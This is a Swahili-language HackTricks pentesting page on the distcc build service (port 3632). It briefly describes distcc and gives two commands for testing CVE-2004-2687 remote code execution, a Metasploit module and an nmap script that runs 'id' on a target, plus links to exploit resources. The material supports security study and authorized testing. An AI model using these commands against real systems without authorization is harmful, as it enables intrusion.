HackTrickstip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na π¬ kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter π¦ @hacktricks_live.
- Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Taarifa za Msingi
Distcc ni chombo kinachoboresha mchakato wa uundaji kwa kutumia nguvu ya usindikaji isiyotumika ya kompyuta nyingine katika mtandao. Wakati distcc imewekwa kwenye mashine, mashine hii ina uwezo wa kusambaza kazi zake za uundaji kwa mfumo mwingine. Mfumo huu wa kupokea lazima uwe unatumia distccd daemon na lazima uwe na compiler inayofaa iliyowekwa ili kushughulikia msimbo uliopelekwa.
Bandari ya kawaida: 3632
PORT STATE SERVICE
3632/tcp open distccd
Utekelezaji
Angalia ikiwa ina udhaifu wa CVE-2004-2687 ili kutekeleza msimbo wowote:
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"
Shodan
Sidhani kama shodan inagundua huduma hii.
Resources
- https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec
- https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855
Post created by Γlex B (@r1p)
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na π¬ kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter π¦ @hacktricks_live.
- Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.